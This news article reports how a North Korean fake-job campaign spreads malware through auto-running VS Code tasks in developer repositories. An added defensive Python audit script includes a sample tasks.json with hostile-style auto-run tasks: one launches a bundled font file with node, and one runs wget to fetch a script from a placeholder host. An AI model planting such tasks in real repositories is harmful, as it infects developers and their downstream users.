
DPRK Fake Job Scams Self-Propagate in 'Contagious Interview'

Dark Reading · Archived Apr 22, 2026

A compromised developer's repository serves as a worm-like infection vector to spread remote access Trojans (RATs) and other malware.

Elizabeth Montalbano, Contributing Writer
April 22, 2026 · 5 Min Read

The infamous phony job-offer ploy by North Korean threat actors is evolving into a self-propagating machine that uses compromised developer projects to infect other code repositories and spread like wildfire through the software supply chain.

The so-called "Contagious Interview" gambit, tracked for several years, has now firmly moved beyond single-target social engineering attacks aimed at compromising organizations via the developer ecosystem: it is now a significant supply chain threat in which a compromised developer's repository itself becomes a worm-like infection vector to spread remote access Trojans (RATs) and other malware, according to a report published this week by Trend Micro.

The latest manifestation of the campaign is by a North Korean actor tracked by Trend Micro as Void Dokkaebi, aka Famous Chollima, which uses fake job lures that target developers with "cryptocurrency wallet credentials, signing keys, and access to continuous integration/continuous delivery (CI/CD) pipelines and production infrastructure," Trend Micro senior threat researcher Lucas Silva wrote in the report.

Attackers use malicious Visual Studio (VS) Code tasks and injected code that can execute during normal development activity to spread malware through the software supply chain, as well as to steal credentials to crypto wallets and other secrets, according to the report.
"When that compromised code reaches organizational or popular open-source repositories, contributors, forks, and downstream projects can also be exposed," he wrote.

Moreover, the campaign uses blockchain infrastructure for payload staging, including Tron, Aptos, and Binance Smart Chain, which puts parts of its delivery infrastructure beyond traditional security takedowns, he said.

Latest Wave of Infections

Void Dokkaebi systematically targets software developers by posing as recruiters from cryptocurrency and AI firms to lure developers into cloning and executing code repositories as part of a testing process during fake job interviews, according to Trend Micro.

These ongoing campaigns abuse the trust that developers place in the common practice of submitting prospective candidates to a technical test during a job interview, Joshua Allman, staff tactical response analyst at security firm Huntress, tells Dark Reading. "Because they are targeting people looking for work, the attackers are likely to have a more engaged target and they can be incredibly precise with who they target," he says. This can lead to a downstream impact of thousands if they are successful at compromising a popular package/project, Allman observes.

North Korean attackers have abused this attack vector since at least 2023, and they have evolved their tactics to go well beyond that initial target. In March alone, Trend Micro identified more than 750 infected code repositories, more than 500 malicious VS Code task configurations, and 101 instances of the commit-tampering tool used by Void Dokkaebi. Repositories belonging to organizations such as data management company DataStax and Java application provider Neutralinojs were also found to be carrying infection markers.
Moreover, the infected VS Code propagation follows the discovery in December of a similar Contagious Interview-style attack that created a malicious npm package factory that operates like a well-oiled machine.

"Worm-Like Behavior"

The VS Code initial infection chain starts with a fabricated job interview in which the victim is asked to clone a code repository, hosted on GitHub, GitLab, or Bitbucket and appearing legitimate, and review or run it as part of a technical assessment, according to Trend Micro.

The delivery mechanism abuses VS Code's workspace task system so that when the victim opens the project in VS Code and accepts the workspace's trust prompt, the task executes without further interaction. Microsoft did not respond immediately to an email from Dark Reading today requesting comment on this abuse of VS Code.

"In some cases, the task fetches the backdoor directly from a remote URL," Trend Micro's Silva wrote. "In others, it launches a font or image file bundled in the repository that contains the malicious payload, a different execution variant that achieves the same result."

At this point, the attack has compromised the targeted developer's ecosystem; however, the "worm-like behavior" doesn't start until the victim commits the code to GitHub, he noted. When that happens, the .vscode folder, hidden by default, makes the malicious code "an effective Trojan horse": any developer who subsequently clones the repository and opens it in VS Code receives a trust prompt that, if accepted, repeats the cycle to create "a self-propagating chain" of infections, Silva wrote.

"Each compromised developer seeds new repositories with the infection vector, and each new victim becomes a potential distributor," Silva wrote.
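The task-based delivery mechanism described above is visible in a cloned repository's .vscode/tasks.json before the folder is ever opened. As an added example that is not part of the Dark Reading article or the Trend Micro report, the Python below audits such a file for the traits the report describes (a task set to run on folder open, a command that references a remote URL, or one that hands a bundled font or image file to an interpreter); the sample tasks.json, the placeholder domain example.invalid, and the heuristics themselves are constructed assumptions, not indicators taken from the report.

```python
"""Triage helper: flag VS Code workspace tasks that auto-run or look like payload launchers."""
import json
import re

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Non-code file types the report describes as payload carriers (bundled font/image files).
CARRIER_EXT = (".ttf", ".otf", ".woff", ".woff2", ".png", ".jpg", ".jpeg", ".gif", ".ico")

# Constructed sample .vscode/tasks.json: one ordinary build task and two auto-run tasks
# of the kind described above (example.invalid is a placeholder, not a real indicator).
SAMPLE_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build", "group": "build"},
    {"label": "prepare env", "type": "shell", "command": "node",
     "args": ["assets/fonts/Inter.woff2"],
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"}},
    {"label": "fetch tools", "type": "shell", "command": "wget",
     "args": ["-q", "https://example.invalid/tools.sh"],
     "runOptions": {"runOn": "folderOpen"}}
  ]
}'''


def load_jsonc(text: str) -> dict:
    """tasks.json may carry // line comments; drop whole-line comments before parsing."""
    stripped = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("//"))
    return json.loads(stripped)


def audit_tasks(tasks_json: str) -> list[dict]:
    """Return one finding per task that auto-runs or matches a payload-launch heuristic."""
    findings = []
    for task in load_jsonc(tasks_json).get("tasks", []):
        text = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs on folder open (runOptions.runOn = folderOpen)")
        if URL_RE.search(text):
            reasons.append("command references a remote URL")
        if any(tok.lower().endswith(CARRIER_EXT) for tok in text.split()):
            reasons.append("command hands a font/image file to an interpreter")
        if task.get("presentation", {}).get("reveal") == "never":
            reasons.append("terminal output hidden (presentation.reveal = never)")
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task {f['label']!r}: " + "; ".join(f["reasons"]))
```

Run it against a freshly cloned interview repository before opening the folder in VS Code, or open the folder in Restricted Mode (declining the trust prompt) so no workspace task can run while you review the file.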
Software Developers on Alert

Fortunately, there are a number of ways enterprise development teams, and developers in the job-seeking process, can avoid being compromised by campaigns like this one and inadvertently infecting the supply chain via downstream propagation.

Organizations should ensure that all development projects use a lock file for dependency management, verify the integrity of updates, and always have some form of active endpoint protection "for when something slips through the cracks," Allman tells Dark Reading. Prospective job seekers also should "think twice before installing" anything presented to them by a prospective employer and, when presented with a routine coding task, "run it in a separate virtual machine/container that does not have access to any of your credentials/tokens/secrets," he says.

Trend Micro also made recommendations to developers to avoid being compromised, including treating any external repository, even during a hiring workflow, as untrusted; detecting unauthorized changes and anomalous commits to any repository they are working with; and limiting privileges and enforcing code-signing validation during the development process.

About the Author

Elizabeth Montalbano, Contributing Writer. Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.